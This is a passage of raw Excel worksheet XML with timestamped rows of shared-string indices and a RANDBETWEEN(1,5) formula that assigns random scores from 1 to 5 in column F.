      <c r="C21360" t="s">
        <v>10</v>
      </c>
      <c r="E21360" s="2" t="s">
        <v>19242</v>
      </c>
      <c r="F21360">
        <f t="shared" ca="1" si="333"/>
        <v>2</v>
      </c>
    </row>
    <row r="21361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21361" s="1">
        <v>43080.681458333333</v>
      </c>
      <c r="C21361" t="s">
        <v>10</v>
      </c>
      <c r="D21361" t="s">
        <v>1036</v>
      </c>
      <c r="E21361" t="s">
        <v>19243</v>
      </c>
      <c r="F21361">
        <f t="shared" ca="1" si="333"/>
        <v>2</v>
      </c>
    </row>
    <row r="21362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21362" s="1">
        <v>43080.681296296294</v>
      </c>
      <c r="C21362" t="s">
        <v>107</v>
      </c>
      <c r="E21362" t="s">
        <v>19244</v>
      </c>
      <c r="F21362">
        <f t="shared" ca="1" si="333"/>
        <v>4</v>
      </c>
    </row>
    <row r="21363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21363" s="1">
        <v>43080.676319444443</v>
      </c>
      <c r="C21363" t="s">
        <v>10</v>
      </c>
      <c r="D21363" t="s">
        <v>14</v>
      </c>
      <c r="E21363" t="s">
        <v>19245</v>
      </c>
      <c r="F21363">
        <f t="shared" ca="1" si="333"/>
        <v>4</v>
      </c>
    </row>
    <row r="21364" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21364" s="1">
        <v>43080.668090277781</v>
      </c>
      <c r="C21364" t="s">
        <v>10</v>
      </c>
      <c r="D21364" t="s">
        <v>1036</v>
      </c>
      <c r="E21364" s="2" t="s">
        <v>19246</v>
      </c>
      <c r="F21364">
        <f t="shared" ca="1" si="333"/>
        <v>2</v>
      </c>
    </row>
    <row r="21365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21365" s="1">
        <v>43080.66679398148</v>
      </c>
      <c r="C21365" t="s">
        <v>10</v>
      </c>
      <c r="D21365" t="s">
        <v>885</v>
      </c>
      <c r="E21365" t="s">
        <v>19247</v>
      </c>
      <c r="F21365">
        <f t="shared" ca="1" si="333"/>
        <v>4</v>
      </c>
    </row>
    <row r="21366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21366" s="1">
        <v>43080.664687500001</v>
      </c>
      <c r="C21366" t="s">
        <v>10</v>
      </c>
      <c r="D21366" t="s">
        <v>20</v>
      </c>
      <c r="E21366" t="s">
        <v>19248</v>
      </c>
      <c r="F21366">
        <f t="shared" ca="1" si="333"/>
        <v>4</v>
      </c>
    </row>
    <row r="21367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21367" s="1">
        <v>43080.637916666667</v>
      </c>
      <c r="C21367" t="s">
        <v>10</v>
      </c>
      <c r="D21367" t="s">
        <v>163</v>
      </c>
      <c r="E21367" t="s">
        <v>19249</v>
      </c>
      <c r="F21367">
        <f t="shared" ca="1" si="333"/>
        <v>4</v>
      </c>
    </row>
    <row r="21368" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A21368" s="1">
        <v>43080.619143518517</v>
      </c>
      <c r="C21368" t="s">
        <v>6</v>
      </c>
      <c r="D21368" t="s">
        <v>821</v>
      </c>
      <c r="E21368" s="2" t="s">
        <v>19250</v>
      </c>
      <c r="F21368">
        <f t="shared" ca="1" si="333"/>
        <v>5</v>
      </c>
    </row>
    <row r="21369" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21369" s="1">
        <v>43080.615717592591</v>
      </c>
      <c r="C21369" t="s">
        <v>16</v>
      </c>
      <c r="E21369" s="2" t="s">
        <v>19251</v>
      </c>
      <c r="F21369">
        <f t="shared" ca="1" si="333"/>
        <v>1</v>
      </c>
    </row>
    <row r="21370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21370" s="1">
        <v>43080.607418981483</v>
      </c>
      <c r="C21370" t="s">
        <v>559</v>
      </c>
      <c r="E21370" t="s">
        <v>19252</v>
      </c>
      <c r="F21370">
        <f t="shared" ca="1" si="333"/>
        <v>5</v>
      </c>
    </row>
    <row r="21371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21371" s="1">
        <v>43080.602187500001</v>
      </c>
      <c r="C21371" t="s">
        <v>10</v>
      </c>
      <c r="E21371" t="s">
        <v>19253</v>
      </c>
      <c r="F21371">
        <f t="shared" ca="1" si="333"/>
        <v>3</v>
      </c>
    </row>
    <row r="21372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21372" s="1">
        <v>43080.596261574072</v>
      </c>
      <c r="C21372" t="s">
        <v>10</v>
      </c>
      <c r="D21372" t="s">
        <v>86</v>
      </c>
      <c r="E21372" t="s">
        <v>19254</v>
      </c>
      <c r="F21372">
        <f t="shared" ca="1" si="333"/>
        <v>3</v>
      </c>
    </row>
    <row r="21373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21373" s="1">
        <v>43080.590474537035</v>
      </c>
      <c r="C21373" t="s">
        <v>10</v>
      </c>
      <c r="D21373" t="s">
        <v>86</v>
      </c>
      <c r="E21373" t="s">
        <v>19255</v>
      </c>
      <c r="F21373">
        <f t="shared" ca="1" si="333"/>
        <v>1</v>
      </c>
    </row>
    <row r="21374" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21374" s="1">
        <v>43080.577407407407</v>
      </c>
      <c r="C21374" t="s">
        <v>10</v>
      </c>
      <c r="D21374" t="s">
        <v>80</v>
      </c>
      <c r="E21374" s="2" t="s">
        <v>19256</v>
      </c>
      <c r="F21374">
        <f t="shared" ca="1" si="333"/>
        <v>5</v>
      </c>
    </row>
    <row r="21375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21375" s="1">
        <v>43080.559560185182</v>
      </c>
      <c r="C21375" t="s">
        <v>10</v>
      </c>
      <c r="D21375" t="s">
        <v>6</v>
      </c>
      <c r="E21375" t="s">
        <v>19257</v>
      </c>
      <c r="F21375">
        <f t="shared" ca="1" si="333"/>
        <v>3</v>
      </c>
    </row>
    <row r="21376" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21376" s="1">
        <v>43080.549803240741</v>
      </c>
      <c r="C21376" t="s">
        <v>10</v>
      </c>
      <c r="D21376" t="s">
        <v>89</v>
      </c>
      <c r="E21376" s="2" t="s">
        <v>19258</v>
      </c>
      <c r="F21376">
        <f t="shared" ca="1" si="333"/>
        <v>2</v>
      </c>
    </row>
    <row r="21377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21377" s="1">
        <v>43080.531840277778</v>
      </c>
      <c r="C21377" t="s">
        <v>10</v>
      </c>
      <c r="D21377" t="s">
        <v>494</v>
      </c>
      <c r="E21377" t="s">
        <v>19259</v>
      </c>
      <c r="F21377">
        <f t="shared" ca="1" si="333"/>
        <v>5</v>
      </c>
    </row>
    <row r="21378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21378" s="1">
        <v>43080.523090277777</v>
      </c>
      <c r="C21378" t="s">
        <v>721</v>
      </c>
      <c r="D21378" t="s">
        <v>312</v>
      </c>
      <c r="E21378" t="s">
        <v>19260</v>
      </c>
      <c r="F21378">
        <f t="shared" ref="F21378:F21441" ca="1" si="334">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="21379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21379" s="1">
        <v>43080.517881944441</v>
      </c>
      <c r="C21379" t="s">
        <v>10</v>
      </c>
      <c r="D21379" t="s">
        <v>20</v>
      </c>
      <c r="E21379" t="s">
        <v>19261</v>
      </c>
      <c r="F21379">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21380" s="1">
        <v>43080.503113425926</v>
      </c>
      <c r="C21380" t="s">
        <v>10</v>
      </c>
      <c r="D21380" t="s">
        <v>222</v>
      </c>
      <c r="E21380" t="s">
        <v>19262</v>
      </c>
      <c r="F21380">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21381" s="1">
        <v>43080.502962962964</v>
      </c>
      <c r="C21381" t="s">
        <v>10</v>
      </c>
      <c r="D21381" t="s">
        <v>107</v>
      </c>
      <c r="E21381" t="s">
        <v>19263</v>
      </c>
      <c r="F21381">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21382" s="1">
        <v>43080.489710648151</v>
      </c>
      <c r="C21382" t="s">
        <v>10</v>
      </c>
      <c r="D21382" t="s">
        <v>192</v>
      </c>
      <c r="E21382" t="s">
        <v>19264</v>
      </c>
      <c r="F21382">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21383" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21383" s="1">
        <v>43080.476805555554</v>
      </c>
      <c r="C21383" t="s">
        <v>10</v>
      </c>
      <c r="D21383" t="s">
        <v>158</v>
      </c>
      <c r="E21383" t="s">
        <v>19265</v>
      </c>
      <c r="F21383">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21384" s="1">
        <v>43080.47388888889</v>
      </c>
      <c r="C21384" t="s">
        <v>10</v>
      </c>
      <c r="D21384" t="s">
        <v>158</v>
      </c>
      <c r="E21384" t="s">
        <v>19266</v>
      </c>
      <c r="F21384">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21385" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A21385" s="1">
        <v>43080.47152777778</v>
      </c>
      <c r="C21385" t="s">
        <v>10</v>
      </c>
      <c r="D21385" t="s">
        <v>112</v>
      </c>
      <c r="E21385" s="2" t="s">
        <v>19267</v>
      </c>
      <c r="F21385">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21386" s="1">
        <v>43080.471516203703</v>
      </c>
      <c r="C21386" t="s">
        <v>10</v>
      </c>
      <c r="D21386" t="s">
        <v>36</v>
      </c>
      <c r="E21386" t="s">
        <v>19268</v>
      </c>
      <c r="F21386">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21387" s="1">
        <v>43080.439375000002</v>
      </c>
      <c r="C21387" t="s">
        <v>10</v>
      </c>
      <c r="D21387" t="s">
        <v>158</v>
      </c>
      <c r="E21387" t="s">
        <v>19269</v>
      </c>
      <c r="F21387">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21388" s="1">
        <v>43080.423020833332</v>
      </c>
      <c r="C21388" t="s">
        <v>10</v>
      </c>
      <c r="D21388" t="s">
        <v>112</v>
      </c>
      <c r="E21388" t="s">
        <v>19270</v>
      </c>
      <c r="F21388">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21389" s="1">
        <v>43080.418483796297</v>
      </c>
      <c r="C21389" t="s">
        <v>10</v>
      </c>
      <c r="D21389" t="s">
        <v>374</v>
      </c>
      <c r="E21389" t="s">
        <v>19271</v>
      </c>
      <c r="F21389">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21390" s="1">
        <v>43080.410358796296</v>
      </c>
      <c r="C21390" t="s">
        <v>10</v>
      </c>
      <c r="D21390" t="s">
        <v>817</v>
      </c>
      <c r="E21390" t="s">
        <v>19272</v>
      </c>
      <c r="F21390">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21391" s="1">
        <v>43080.409444444442</v>
      </c>
      <c r="C21391" t="s">
        <v>10</v>
      </c>
      <c r="D21391" t="s">
        <v>107</v>
      </c>
      <c r="E21391" t="s">
        <v>19273</v>
      </c>
      <c r="F21391">
        <f t="shared" ca="1" si="334"/>
        <v>5</v>
      </c>
    </row>
    <row r="21392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21392" s="1">
        <v>43080.393240740741</v>
      </c>
      <c r="C21392" t="s">
        <v>10</v>
      </c>
      <c r="D21392" t="s">
        <v>178</v>
      </c>
      <c r="E21392" t="s">
        <v>19274</v>
      </c>
      <c r="F21392">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21393" s="1">
        <v>43080.38559027778</v>
      </c>
      <c r="C21393" t="s">
        <v>10</v>
      </c>
      <c r="D21393" t="s">
        <v>20</v>
      </c>
      <c r="E21393" t="s">
        <v>19275</v>
      </c>
      <c r="F21393">
        <f t="shared" ca="1" si="334"/>
        <v>5</v>
      </c>
    </row>
    <row r="21394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21394" s="1">
        <v>43080.363449074073</v>
      </c>
      <c r="C21394" t="s">
        <v>10</v>
      </c>
      <c r="D21394" t="s">
        <v>112</v>
      </c>
      <c r="E21394" t="s">
        <v>19276</v>
      </c>
      <c r="F21394">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21395" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A21395" s="1">
        <v>43080.352453703701</v>
      </c>
      <c r="C21395" t="s">
        <v>430</v>
      </c>
      <c r="E21395" s="2" t="s">
        <v>19277</v>
      </c>
      <c r="F21395">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21396" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A21396" s="1">
        <v>43080.340196759258</v>
      </c>
      <c r="C21396" t="s">
        <v>41</v>
      </c>
      <c r="E21396" s="2" t="s">
        <v>19278</v>
      </c>
      <c r="F21396">
        <f t="shared" ca="1" si="334"/>
        <v>5</v>
      </c>
    </row>
    <row r="21397" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21397" s="1">
        <v>43080.330925925926</v>
      </c>
      <c r="C21397" t="s">
        <v>50</v>
      </c>
      <c r="E21397" s="2" t="s">
        <v>19279</v>
      </c>
      <c r="F21397">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21398" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21398" s="1">
        <v>43080.292094907411</v>
      </c>
      <c r="C21398" t="s">
        <v>48</v>
      </c>
      <c r="E21398" s="2" t="s">
        <v>19280</v>
      </c>
      <c r="F21398">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21399" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21399" s="1">
        <v>43080.28665509259</v>
      </c>
      <c r="C21399" t="s">
        <v>48</v>
      </c>
      <c r="E21399" s="2" t="s">
        <v>19281</v>
      </c>
      <c r="F21399">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21400" s="1">
        <v>43080.243148148147</v>
      </c>
      <c r="C21400" t="s">
        <v>41</v>
      </c>
      <c r="E21400" t="s">
        <v>19282</v>
      </c>
      <c r="F21400">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21401" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21401" s="1">
        <v>43080.213240740741</v>
      </c>
      <c r="C21401" t="s">
        <v>430</v>
      </c>
      <c r="D21401" t="s">
        <v>312</v>
      </c>
      <c r="E21401" s="2" t="s">
        <v>19283</v>
      </c>
      <c r="F21401">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21402" s="1">
        <v>43080.212199074071</v>
      </c>
      <c r="C21402" t="s">
        <v>731</v>
      </c>
      <c r="E21402" t="s">
        <v>19284</v>
      </c>
      <c r="F21402">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21403" s="1">
        <v>43080.206620370373</v>
      </c>
      <c r="C21403" t="s">
        <v>48</v>
      </c>
      <c r="E21403" t="s">
        <v>19285</v>
      </c>
      <c r="F21403">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21404" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21404" s="1">
        <v>43080.188368055555</v>
      </c>
      <c r="C21404" t="s">
        <v>48</v>
      </c>
      <c r="E21404" s="2" t="s">
        <v>19286</v>
      </c>
      <c r="F21404">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21405" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21405" s="1">
        <v>43080.109097222223</v>
      </c>
      <c r="C21405" t="s">
        <v>134</v>
      </c>
      <c r="E21405" t="s">
        <v>19287</v>
      </c>
      <c r="F21405">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21406" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21406" s="1">
        <v>43080.031365740739</v>
      </c>
      <c r="C21406" t="s">
        <v>9633</v>
      </c>
      <c r="D21406" t="s">
        <v>25</v>
      </c>
      <c r="E21406" s="2" t="s">
        <v>19288</v>
      </c>
      <c r="F21406">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21407" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21407" s="1">
        <v>43079.922858796293</v>
      </c>
      <c r="C21407" t="s">
        <v>140</v>
      </c>
      <c r="D21407" t="s">
        <v>141</v>
      </c>
      <c r="E21407" s="2" t="s">
        <v>19289</v>
      </c>
      <c r="F21407">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21408" s="1">
        <v>43079.858877314815</v>
      </c>
      <c r="C21408" t="s">
        <v>73</v>
      </c>
      <c r="E21408" t="s">
        <v>19290</v>
      </c>
      <c r="F21408">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21409" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21409" s="1">
        <v>43079.771863425929</v>
      </c>
      <c r="C21409" t="s">
        <v>65</v>
      </c>
      <c r="D21409" t="s">
        <v>312</v>
      </c>
      <c r="E21409" s="2" t="s">
        <v>19291</v>
      </c>
      <c r="F21409">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21410" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21410" s="1">
        <v>43079.738310185188</v>
      </c>
      <c r="C21410" t="s">
        <v>140</v>
      </c>
      <c r="D21410" t="s">
        <v>234</v>
      </c>
      <c r="E21410" s="2" t="s">
        <v>19292</v>
      </c>
      <c r="F21410">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21411" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21411" s="1">
        <v>43079.734398148146</v>
      </c>
      <c r="C21411" t="s">
        <v>570</v>
      </c>
      <c r="D21411" t="s">
        <v>39</v>
      </c>
      <c r="E21411" s="2" t="s">
        <v>19293</v>
      </c>
      <c r="F21411">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21412" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21412" s="1">
        <v>43079.64261574074</v>
      </c>
      <c r="C21412" t="s">
        <v>10088</v>
      </c>
      <c r="D21412" t="s">
        <v>36</v>
      </c>
      <c r="E21412" s="2" t="s">
        <v>19294</v>
      </c>
      <c r="F21412">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21413" s="1">
        <v>43079.560694444444</v>
      </c>
      <c r="C21413" t="s">
        <v>10</v>
      </c>
      <c r="D21413" t="s">
        <v>667</v>
      </c>
      <c r="E21413" t="s">
        <v>3948</v>
      </c>
      <c r="F21413">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21414" s="1">
        <v>43079.383067129631</v>
      </c>
      <c r="C21414" t="s">
        <v>10</v>
      </c>
      <c r="D21414" t="s">
        <v>494</v>
      </c>
      <c r="E21414" t="s">
        <v>19295</v>
      </c>
      <c r="F21414">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21415" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21415" s="1">
        <v>43079.319733796299</v>
      </c>
      <c r="C21415" t="s">
        <v>17</v>
      </c>
      <c r="E21415" s="2" t="s">
        <v>19296</v>
      </c>
      <c r="F21415">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21416" s="1">
        <v>43079.264907407407</v>
      </c>
      <c r="C21416" t="s">
        <v>10</v>
      </c>
      <c r="D21416" t="s">
        <v>41</v>
      </c>
      <c r="E21416" t="s">
        <v>19297</v>
      </c>
      <c r="F21416">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21417" s="1">
        <v>43079.157361111109</v>
      </c>
      <c r="C21417" t="s">
        <v>48</v>
      </c>
      <c r="E21417" t="s">
        <v>19298</v>
      </c>
      <c r="F21417">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21418" s="1">
        <v>43078.672951388886</v>
      </c>
      <c r="C21418" t="s">
        <v>10</v>
      </c>
      <c r="D21418" t="s">
        <v>6</v>
      </c>
      <c r="E21418" t="s">
        <v>19299</v>
      </c>
      <c r="F21418">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21419" s="1">
        <v>43078.579907407409</v>
      </c>
      <c r="C21419" t="s">
        <v>140</v>
      </c>
      <c r="D21419" t="s">
        <v>234</v>
      </c>
      <c r="E21419" t="s">
        <v>19300</v>
      </c>
      <c r="F21419">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21420" s="1">
        <v>43078.579895833333</v>
      </c>
      <c r="C21420" t="s">
        <v>140</v>
      </c>
      <c r="D21420" t="s">
        <v>234</v>
      </c>
      <c r="E21420" t="s">
        <v>19300</v>
      </c>
      <c r="F21420">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21421" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21421" s="1">
        <v>43078.534733796296</v>
      </c>
      <c r="C21421" t="s">
        <v>6</v>
      </c>
      <c r="D21421" t="s">
        <v>114</v>
      </c>
      <c r="E21421" t="s">
        <v>19301</v>
      </c>
      <c r="F21421">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21422" s="1">
        <v>43078.418657407405</v>
      </c>
      <c r="C21422" t="s">
        <v>10</v>
      </c>
      <c r="D21422" t="s">
        <v>20</v>
      </c>
      <c r="E21422" t="s">
        <v>19302</v>
      </c>
      <c r="F21422">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21423" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21423" s="1">
        <v>43078.20003472222</v>
      </c>
      <c r="C21423" t="s">
        <v>314</v>
      </c>
      <c r="E21423" s="2" t="s">
        <v>19303</v>
      </c>
      <c r="F21423">
        <f t="shared" ca="1" si="334"/>
        <v>5</v>
      </c>
    </row>
    <row r="21424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21424" s="1">
        <v>43077.982407407406</v>
      </c>
      <c r="C21424" t="s">
        <v>226</v>
      </c>
      <c r="F21424">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21425" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21425" s="1">
        <v>43077.708657407406</v>
      </c>
      <c r="C21425" t="s">
        <v>10</v>
      </c>
      <c r="D21425" t="s">
        <v>17</v>
      </c>
      <c r="E21425" t="s">
        <v>19304</v>
      </c>
      <c r="F21425">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21426" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21426" s="1">
        <v>43077.690208333333</v>
      </c>
      <c r="C21426" t="s">
        <v>10</v>
      </c>
      <c r="D21426" t="s">
        <v>36</v>
      </c>
      <c r="E21426" s="2" t="s">
        <v>19305</v>
      </c>
      <c r="F21426">
        <f t="shared" ca="1" si="334"/>
        <v>5</v>
      </c>
    </row>
    <row r="21427" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21427" s="1">
        <v>43077.670162037037</v>
      </c>
      <c r="C21427" t="s">
        <v>10</v>
      </c>
      <c r="D21427" t="s">
        <v>6</v>
      </c>
      <c r="E21427" t="s">
        <v>19306</v>
      </c>
      <c r="F21427">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21428" s="1">
        <v>43077.663634259261</v>
      </c>
      <c r="C21428" t="s">
        <v>10</v>
      </c>
      <c r="D21428" t="s">
        <v>17</v>
      </c>
      <c r="E21428" t="s">
        <v>19307</v>
      </c>
      <c r="F21428">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21429" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21429" s="1">
        <v>43077.632962962962</v>
      </c>
      <c r="C21429" t="s">
        <v>10</v>
      </c>
      <c r="D21429" t="s">
        <v>52</v>
      </c>
      <c r="E21429" t="s">
        <v>19308</v>
      </c>
      <c r="F21429">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21430" s="1">
        <v>43077.629884259259</v>
      </c>
      <c r="C21430" t="s">
        <v>10</v>
      </c>
      <c r="D21430" t="s">
        <v>6</v>
      </c>
      <c r="E21430" t="s">
        <v>19309</v>
      </c>
      <c r="F21430">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21431" s="1">
        <v>43077.627974537034</v>
      </c>
      <c r="C21431" t="s">
        <v>10</v>
      </c>
      <c r="D21431" t="s">
        <v>1056</v>
      </c>
      <c r="E21431" t="s">
        <v>19310</v>
      </c>
      <c r="F21431">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21432" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21432" s="1">
        <v>43077.627835648149</v>
      </c>
      <c r="C21432" t="s">
        <v>6</v>
      </c>
      <c r="D21432" t="s">
        <v>2139</v>
      </c>
      <c r="E21432" s="2" t="s">
        <v>19311</v>
      </c>
      <c r="F21432">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21433" s="1">
        <v>43077.616064814814</v>
      </c>
      <c r="C21433" t="s">
        <v>6</v>
      </c>
      <c r="D21433" t="s">
        <v>25</v>
      </c>
      <c r="E21433" t="s">
        <v>19312</v>
      </c>
      <c r="F21433">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21434" s="1">
        <v>43077.59915509259</v>
      </c>
      <c r="C21434" t="s">
        <v>60</v>
      </c>
      <c r="E21434" t="s">
        <v>19313</v>
      </c>
      <c r="F21434">
        <f t="shared" ca="1" si="334"/>
        <v>4</v>
      </c>
    </row>
    <row r="21435" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21435" s="1">
        <v>43077.571284722224</v>
      </c>
      <c r="C21435" t="s">
        <v>6</v>
      </c>
      <c r="D21435" t="s">
        <v>114</v>
      </c>
      <c r="E21435" t="s">
        <v>19314</v>
      </c>
      <c r="F21435">
        <f t="shared" ca="1" si="334"/>
        <v>3</v>
      </c>
    </row>
    <row r="21436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21436" s="1">
        <v>43077.564432870371</v>
      </c>
      <c r="C21436" t="s">
        <v>10</v>
      </c>
      <c r="D21436" t="s">
        <v>158</v>
      </c>
      <c r="E21436" t="s">
        <v>19315</v>
      </c>
      <c r="F21436">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21437" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21437" s="1">
        <v>43077.544583333336</v>
      </c>
      <c r="C21437" t="s">
        <v>10</v>
      </c>
      <c r="D21437" t="s">
